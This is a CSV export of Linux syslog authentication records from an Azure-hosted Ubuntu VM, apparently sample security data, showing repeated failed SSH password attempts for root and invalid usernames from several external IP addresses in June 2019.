+9788,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:58,UbuntuDevEnv,2019-06-25 22:46:57,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,49632,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9789,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:58,UbuntuDevEnv,2019-06-25 22:46:57,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.199.113.140,49632,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.199.113.1,,0,
+9790,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:59,UbuntuDevEnv,2019-06-25 22:46:58,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 34979 ssh2,49616,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,34979,,
+9791,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:59,UbuntuDevEnv,2019-06-25 22:46:58,auth,UbuntuDevEnv,info,Failed password for invalid user roy from 139.199.113.140 port 55856 ssh2,49632,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,roy,139.199.113.1,55856,,
+9792,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:59,UbuntuDevEnv,2019-06-25 22:46:59,auth,UbuntuDevEnv,info,Disconnected from invalid user roy 139.199.113.140 port 55856 [preauth],49632,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,roy,139.199.113.1,55856,,
+9793,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:59,UbuntuDevEnv,2019-06-25 22:46:59,auth,UbuntuDevEnv,info,Received disconnect from 139.199.113.140 port 55856:11: Bye Bye [preauth],49632,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.199.113.1,55856,,
+9794,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:47:01,UbuntuDevEnv,2019-06-25 22:47:00,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 34979 ssh2,49616,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,34979,,
+9795,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:47:10,UbuntuDevEnv,2019-06-25 22:47:09,auth,UbuntuDevEnv,info,Received disconnect from 218.92.0.175 port 34979:11:  [preauth],49616,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,34979,,
+9796,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:47:10,UbuntuDevEnv,2019-06-25 22:47:09,authpriv,UbuntuDevEnv,notice,PAM 2 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,49616,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9797,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:47:10,UbuntuDevEnv,2019-06-25 22:47:09,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 218.92.0.175 port 34979 [preauth],49616,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,218.92.0.1,34979,,
+9798,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:47:13,UbuntuDevEnv,2019-06-25 22:47:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,49685,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9799,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:47:16,UbuntuDevEnv,2019-06-25 22:47:16,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 47057 ssh2,49685,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,47057,,
+9800,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:47:29,UbuntuDevEnv,2019-06-25 22:47:29,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.175 port 47057: Too many authentication failures [preauth],49685,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,47057,,
+9801,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:47:29,UbuntuDevEnv,2019-06-25 22:47:29,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.175 port 47057 ssh2 [preauth],49685,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,47057,,
+9802,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:47:29,UbuntuDevEnv,2019-06-25 22:47:29,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 218.92.0.175 port 47057 ssh2],49685,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,47057,,
+9803,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:47:29,UbuntuDevEnv,2019-06-25 22:47:29,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,49685,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9804,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:47:29,UbuntuDevEnv,2019-06-25 22:47:29,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,49685,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+9805,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:47:33,UbuntuDevEnv,2019-06-25 22:47:32,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,49834,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9806,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:47:34,UbuntuDevEnv,2019-06-25 22:47:34,auth,UbuntuDevEnv,info,Invalid user xue from 77.232.128.87 port 40640,49853,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xue,77.232.128.8,40640,,
+9807,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:47:34,UbuntuDevEnv,2019-06-25 22:47:34,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,49853,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9808,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:47:34,UbuntuDevEnv,2019-06-25 22:47:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.232.128.87,49853,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.232.128.8,,0,
+9809,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:47:35,UbuntuDevEnv,2019-06-25 22:47:34,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 58823 ssh2,49834,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,58823,,
+9810,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:47:36,UbuntuDevEnv,2019-06-25 22:47:35,auth,UbuntuDevEnv,info,Failed password for invalid user xue from 77.232.128.87 port 40640 ssh2,49853,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xue,77.232.128.8,40640,,
+9811,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:47:36,UbuntuDevEnv,2019-06-25 22:47:35,auth,UbuntuDevEnv,info,Received disconnect from 77.232.128.87 port 40640:11: Bye Bye [preauth],49853,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.232.128.8,40640,,
+9812,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:47:36,UbuntuDevEnv,2019-06-25 22:47:35,auth,UbuntuDevEnv,info,Disconnected from invalid user xue 77.232.128.87 port 40640 [preauth],49853,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xue,77.232.128.8,40640,,
+9813,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:47:38,UbuntuDevEnv,2019-06-25 22:47:37,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 58823 ssh2,49834,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,58823,,
+9814,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:47:50,UbuntuDevEnv,2019-06-25 22:47:49,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.175 port 58823 ssh2 [preauth],49834,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,58823,,
+9815,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:47:50,UbuntuDevEnv,2019-06-25 22:47:49,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.175 port 58823: Too many authentication failures [preauth],49834,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,58823,,
+9816,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:47:50,UbuntuDevEnv,2019-06-25 22:47:49,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,49834,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9817,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:47:50,UbuntuDevEnv,2019-06-25 22:47:49,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 218.92.0.175 port 58823 ssh2],49834,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,58823,,
+9818,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:47:50,UbuntuDevEnv,2019-06-25 22:47:49,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,49834,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+9819,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:47:52,UbuntuDevEnv,2019-06-25 22:47:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,49908,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9820,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:47:54,UbuntuDevEnv,2019-06-25 22:47:54,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 6674 ssh2,49908,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,6674,,
+9821,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:48:01,UbuntuDevEnv,2019-06-25 22:47:57,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 6674 ssh2,49908,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,6674,,
+9822,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:48:02,UbuntuDevEnv,2019-06-25 22:48:01,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 6674 ssh2,49908,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,6674,,
+9823,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:48:02,UbuntuDevEnv,2019-06-25 22:48:01,auth,UbuntuDevEnv,info,Invalid user tigrou from 178.62.54.79 port 35710,49946,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tigrou,178.62.54.7,35710,,
+9824,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:48:02,UbuntuDevEnv,2019-06-25 22:48:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=178.62.54.79,49946,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,178.62.54.7,,0,
+9825,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:48:02,UbuntuDevEnv,2019-06-25 22:48:01,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,49946,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9826,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:48:04,UbuntuDevEnv,2019-06-25 22:48:04,auth,UbuntuDevEnv,info,Failed password for invalid user tigrou from 178.62.54.79 port 35710 ssh2,49946,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tigrou,178.62.54.7,35710,,
+9827,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:48:04,UbuntuDevEnv,2019-06-25 22:48:04,auth,UbuntuDevEnv,info,Received disconnect from 178.62.54.79 port 35710:11: Bye Bye [preauth],49946,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,178.62.54.7,35710,,
+9828,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:48:04,UbuntuDevEnv,2019-06-25 22:48:04,auth,UbuntuDevEnv,info,Disconnected from invalid user tigrou 178.62.54.79 port 35710 [preauth],49946,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tigrou,178.62.54.7,35710,,
+9829,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:48:05,UbuntuDevEnv,2019-06-25 22:48:05,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 6674 ssh2,49908,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,6674,,
+9830,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:48:09,UbuntuDevEnv,2019-06-25 22:48:07,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 6674 ssh2,49908,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,6674,,
+9831,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:48:09,UbuntuDevEnv,2019-06-25 22:48:08,auth,UbuntuDevEnv,info,Invalid user test3 from 152.250.252.179 port 55814,49973,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test3,152.250.252.1,55814,,
+9832,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:48:09,UbuntuDevEnv,2019-06-25 22:48:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=152.250.252.179,49973,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,152.250.252.1,,0,
+9833,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:48:09,UbuntuDevEnv,2019-06-25 22:48:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,49973,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9834,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:48:11,UbuntuDevEnv,2019-06-25 22:48:10,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.175 port 6674: Too many authentication failures [preauth],49908,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,6674,,
+9835,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:48:11,UbuntuDevEnv,2019-06-25 22:48:10,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,49908,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9836,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:48:11,UbuntuDevEnv,2019-06-25 22:48:10,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,49908,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+9837,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:48:11,UbuntuDevEnv,2019-06-25 22:48:10,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.175 port 6674 ssh2 [preauth],49908,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,6674,,
+9838,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:48:11,UbuntuDevEnv,2019-06-25 22:48:10,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 6674 ssh2,49908,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,6674,,
+9839,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:48:11,UbuntuDevEnv,2019-06-25 22:48:10,auth,UbuntuDevEnv,info,Failed password for invalid user test3 from 152.250.252.179 port 55814 ssh2,49973,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test3,152.250.252.1,55814,,
+9840,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:48:11,UbuntuDevEnv,2019-06-25 22:48:11,auth,UbuntuDevEnv,info,Disconnected from invalid user test3 152.250.252.179 port 55814 [preauth],49973,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test3,152.250.252.1,55814,,
+9841,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:48:11,UbuntuDevEnv,2019-06-25 22:48:11,auth,UbuntuDevEnv,info,Received disconnect from 152.250.252.179 port 55814:11: Bye Bye [preauth],49973,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,152.250.252.1,55814,,
+9842,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:48:21,UbuntuDevEnv,2019-06-25 22:48:21,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,49989,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9843,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:48:22,UbuntuDevEnv,2019-06-25 22:48:22,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 20221 ssh2,49989,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,20221,,
+9844,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:48:24,UbuntuDevEnv,2019-06-25 22:48:24,auth,UbuntuDevEnv,info,Invalid user files from 139.199.113.140 port 42030,50030,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,files,139.199.113.1,42030,,
+9845,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:48:24,UbuntuDevEnv,2019-06-25 22:48:24,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.199.113.140,50030,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.199.113.1,,0,
+9846,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:48:24,UbuntuDevEnv,2019-06-25 22:48:24,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,50030,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9847,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:48:26,UbuntuDevEnv,2019-06-25 22:48:25,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 20221 ssh2,49989,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,20221,,
